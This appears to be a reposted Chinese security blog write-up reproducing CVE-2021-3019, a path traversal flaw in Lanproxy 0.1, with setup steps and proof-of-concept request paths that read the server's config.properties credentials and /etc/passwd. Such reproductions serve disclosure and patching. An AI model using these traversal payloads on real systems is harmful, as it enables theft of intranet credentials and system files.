Lanproxy 任意文件读取漏洞 (CVE-2021-3019)复现

admin 2021年4月30日09:08:44评论92 views字数 574阅读1分54秒阅读模式

漏洞概述


Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

 

影响版本


lanproxy 0.1

 

环境搭建


下载proxy-server-0.1.zip

下载地址

https://file.nioee.com/d/2e81550ebdbd416c933f/

Lanproxy 任意文件读取漏洞 (CVE-2021-3019)复现

解压安装之后移动文件

mv proxy-server-0.1 /usr/local/

Lanproxy 任意文件读取漏洞 (CVE-2021-3019)复现

接着启动服务

cd /usr/local/proxy-server-0.1/binchmod +x startup.sh./startup.sh

Lanproxy 任意文件读取漏洞 (CVE-2021-3019)复现

访问 http://host_ip:8090 ,即可看到登录界面。

Lanproxy 任意文件读取漏洞 (CVE-2021-3019)复现


漏洞复现

 

Poc

/../conf/config.properties

 Lanproxy 任意文件读取漏洞 (CVE-2021-3019)复现

接着我们在试试读取passwd

/../../../../../../../../../etc/passwd

Lanproxy 任意文件读取漏洞 (CVE-2021-3019)复现

成功读取

 

修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):Lanproxy 任意文件读取漏洞 (CVE-2021-3019)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月30日09:08:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Lanproxy 任意文件读取漏洞 (CVE-2021-3019)复现https://cn-sec.com/archives/239451.html

发表评论

匿名网友 填写信息